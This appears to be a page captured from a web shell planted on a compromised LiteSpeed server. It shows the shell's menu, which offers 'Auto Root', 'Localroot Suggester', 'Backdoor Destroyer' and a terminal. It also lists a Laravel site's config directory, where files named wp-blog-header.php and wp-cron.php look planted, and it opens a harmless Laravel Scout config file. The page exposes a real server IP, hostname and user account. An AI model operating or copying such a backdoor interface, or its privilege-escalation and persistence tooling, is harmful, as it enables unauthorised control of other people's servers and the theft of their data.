Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
dailyprofit.return /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
app.php
8.92
KB
-rw-r--r--
2023-07-25 23:21
auth.php
4.08
KB
-rw-r--r--
2023-07-25 23:21
broadcasting.php
1.88
KB
-rw-r--r--
2023-07-25 23:21
cache.php
3.3
KB
-rw-r--r--
2023-07-25 23:21
coinbase.php
281
B
-rw-r--r--
2023-07-25 23:21
coinremitter.php
221
B
-rw-r--r--
2023-07-25 23:21
cors.php
880
B
-rw-r--r--
2023-07-25 23:21
database.php
5.31
KB
-rw-r--r--
2023-07-25 23:21
datatables.php
3.98
KB
-rw-r--r--
2023-07-25 23:21
error_log
13.27
KB
-rw-r--r--
2026-02-17 07:18
filesystems.php
2.39
KB
-rw-r--r--
2023-07-25 23:21
google2fa.php
1.79
KB
-rw-r--r--
2023-07-25 23:21
hashing.php
1.59
KB
-rw-r--r--
2023-07-25 23:21
laraupdater.php
989
B
-rw-r--r--
2023-07-25 23:21
laravel_ticket.php
2.48
KB
-rw-r--r--
2023-07-25 23:21
logging.php
3.78
KB
-rw-r--r--
2023-07-25 23:21
mail.php
3.63
KB
-rw-r--r--
2023-07-25 23:21
notify.php
1.86
KB
-rw-r--r--
2023-07-25 23:21
paypal.php
1.11
KB
-rw-r--r--
2023-07-25 23:21
paystack.php
725
B
-rw-r--r--
2023-07-25 23:21
perfectmoney.php
5.35
KB
-rw-r--r--
2023-07-25 23:21
permission.php
5.61
KB
-rw-r--r--
2023-07-25 23:21
purifier.php
4.72
KB
-rw-r--r--
2023-07-25 23:21
queue.php
2.93
KB
-rw-r--r--
2023-07-25 23:21
sanctum.php
2.31
KB
-rw-r--r--
2023-07-25 23:21
scout.php
4.91
KB
-rw-r--r--
2023-07-25 23:21
services.php
1012
B
-rw-r--r--
2023-07-25 23:21
session.php
7.05
KB
-rw-r--r--
2023-07-25 23:21
setting.php
25.39
KB
-rw-r--r--
2023-07-25 23:21
sms.php
380
B
-rw-r--r--
2023-07-25 23:21
theme.php
51
B
-rw-r--r--
2023-07-25 13:22
translation.php
2.31
KB
-rw-r--r--
2023-07-25 23:21
view.php
1.06
KB
-rw-r--r--
2023-07-25 23:21
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Default Search Engine |-------------------------------------------------------------------------- | | This option controls the default search connection that gets used while | using Laravel Scout. This connection is used when syncing all models | to the search service. You should adjust this based on your needs. | | Supported: "algolia", "meilisearch", "database", "collection", "null" | */ 'driver' => env('SCOUT_DRIVER', 'database'), /* |-------------------------------------------------------------------------- | Index Prefix |-------------------------------------------------------------------------- | | Here you may specify a prefix that will be applied to all search index | names used by Scout. This prefix may be useful if you have multiple | "tenants" or applications sharing the same search infrastructure. | */ 'prefix' => env('SCOUT_PREFIX', ''), /* |-------------------------------------------------------------------------- | Queue Data Syncing |-------------------------------------------------------------------------- | | This option allows you to control if the operations that sync your data | with your search engines are queued. When this is set to "true" then | all automatic data syncing will get queued for better performance. | */ 'queue' => env('SCOUT_QUEUE', false), /* |-------------------------------------------------------------------------- | Database Transactions |-------------------------------------------------------------------------- | | This configuration option determines if your data will only be synced | with your search indexes after every open database transaction has | been committed, thus preventing any discarded data from syncing. | */ 'after_commit' => false, /* |-------------------------------------------------------------------------- | Chunk Sizes |-------------------------------------------------------------------------- | | These options allow you to control the maximum chunk size when you are | mass importing data into the search engine. This allows you to fine | tune each of these chunk sizes based on the power of the servers. | */ 'chunk' => [ 'searchable' => 500, 'unsearchable' => 500, ], /* |-------------------------------------------------------------------------- | Soft Deletes |-------------------------------------------------------------------------- | | This option allows to control whether to keep soft deleted records in | the search indexes. Maintaining soft deleted records can be useful | if your application still needs to search for the records later. | */ 'soft_delete' => false, /* |-------------------------------------------------------------------------- | Identify User |-------------------------------------------------------------------------- | | This option allows you to control whether to notify the search engine | of the user performing the search. This is sometimes useful if the | engine supports any analytics based on this application's users. | | Supported engines: "algolia" | */ 'identify' => env('SCOUT_IDENTIFY', false), /* |-------------------------------------------------------------------------- | Algolia Configuration |-------------------------------------------------------------------------- | | Here you may configure your Algolia settings. Algolia is a cloud hosted | search engine which works great with Scout out of the box. Just plug | in your application ID and admin API key to get started searching. | */ 'algolia' => [ 'id' => env('ALGOLIA_APP_ID', ''), 'secret' => env('ALGOLIA_SECRET', ''), ], /* |-------------------------------------------------------------------------- | Meilisearch Configuration |-------------------------------------------------------------------------- | | Here you may configure your Meilisearch settings. Meilisearch is an open | source search engine with minimal configuration. Below, you can state | the host and key information for your own Meilisearch installation. | | See: https://docs.meilisearch.com/guides/advanced_guides/configuration.html | */ 'meilisearch' => [ 'host' => env('MEILISEARCH_HOST', 'http://localhost:7700'), 'key' => env('MEILISEARCH_KEY'), 'index-settings' => [ // 'users' => [ // 'filterableAttributes'=> ['id', 'name', 'email'], // ], ], ], ];